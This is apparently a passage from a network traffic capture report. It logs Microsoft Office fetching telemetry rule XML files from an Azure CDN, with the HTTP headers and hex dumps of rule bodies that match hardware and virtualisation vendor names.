                66192.168.2.44981513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:55 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:55 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:55 GMT
                Content-Type: text/xml
                Content-Length: 408
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                ETag: "0x8DC582BB9B6040B"
                x-ms-request-id: 2f519f63-901e-0016-75ff-16efe9000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012655Z-1657d5bbd487nf59mzf5b3gk8n00000002d000000000efkn
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:55 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                Session IDSource IPSource PortDestination IPDestination Port
                67192.168.2.44981413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:55 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:55 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:55 GMT
                Content-Type: text/xml
                Content-Length: 474
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                ETag: "0x8DC582BB3F48DAE"
                x-ms-request-id: ef9cab6f-f01e-0099-0d00-179171000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012655Z-1657d5bbd48tqvfc1ysmtbdrg000000002p000000000c165
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:55 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                68192.168.2.44981613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:55 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:55 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:55 GMT
                Content-Type: text/xml
                Content-Length: 469
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                ETag: "0x8DC582BB3CAEBB8"
                x-ms-request-id: b67c2655-301e-0096-2300-17e71d000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012655Z-1657d5bbd48brl8we3nu8cxwgn000000031000000000p0u1
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:55 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                69192.168.2.44981813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:55 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:56 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:56 GMT
                Content-Type: text/xml
                Content-Length: 472
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                ETag: "0x8DC582B91EAD002"
                x-ms-request-id: 763e8d43-601e-000d-6912-172618000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012656Z-1657d5bbd482lxwq1dp2t1zwkc00000002gg00000000gfcw
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                70192.168.2.44981713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:55 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:56 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:55 GMT
                Content-Type: text/xml
                Content-Length: 416
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                ETag: "0x8DC582BB5284CCE"
                x-ms-request-id: 821e4157-c01e-0014-3301-17a6a3000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012655Z-1657d5bbd48cpbzgkvtewk0wu000000002v000000000ges2
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:56 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                Session IDSource IPSource PortDestination IPDestination Port
                71192.168.2.44981913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:55 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:56 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:56 GMT
                Content-Type: text/xml
                Content-Length: 432
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                ETag: "0x8DC582BAABA2A10"
                x-ms-request-id: bfab55ab-401e-0015-6202-170e8d000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012656Z-1657d5bbd4824mj9d6vp65b6n4000000030000000000bk1a
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:56 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                Session IDSource IPSource PortDestination IPDestination Port
                72192.168.2.44982013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:55 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:56 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:56 GMT
                Content-Type: text/xml
                Content-Length: 475
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                ETag: "0x8DC582BBA740822"
                x-ms-request-id: 01bf113a-f01e-003c-3703-178cf0000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012656Z-1657d5bbd482tlqpvyz9e93p5400000002u000000000k0ut
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:56 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                73192.168.2.44982113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:56 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:56 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:56 GMT
                Content-Type: text/xml
                Content-Length: 427
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                ETag: "0x8DC582BB464F255"
                x-ms-request-id: 7875ffac-201e-000c-7f02-1779c4000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012656Z-1657d5bbd48762wn1qw4s5sd3000000002q0000000009hb0
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:56 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                Session IDSource IPSource PortDestination IPDestination Port
                74192.168.2.44982413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:56 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:56 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:56 GMT
                Content-Type: text/xml
                Content-Length: 472
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                ETag: "0x8DC582B984BF177"
                x-ms-request-id: 2f576d96-401e-0047-3902-178597000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012656Z-1657d5bbd48tqvfc1ysmtbdrg000000002n000000000fd34
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                75192.168.2.44982213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:56 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:56 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:56 GMT
                Content-Type: text/xml
                Content-Length: 474
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                ETag: "0x8DC582BA4037B0D"
                x-ms-request-id: 3b7b7106-501e-0064-43e7-161f54000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012656Z-1657d5bbd48lknvp09v995n79000000002ag00000000rps3
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:56 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                76192.168.2.44982313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:56 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:56 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:56 GMT
                Content-Type: text/xml
                Content-Length: 419
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                ETag: "0x8DC582BA6CF78C8"
                x-ms-request-id: 3c7823fd-401e-0015-0c60-170e8d000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012656Z-1657d5bbd482lxwq1dp2t1zwkc00000002fg00000000nnra
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:56 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                Session IDSource IPSource PortDestination IPDestination Port
                77192.168.2.44980813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:57 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:57 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:57 GMT
                Content-Type: text/xml
                Content-Length: 485
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                ETag: "0x8DC582BB9769355"
                x-ms-request-id: 8d3bec0a-601e-0070-32fe-16a0c9000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012657Z-1657d5bbd48cpbzgkvtewk0wu000000002w000000000d5g2
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
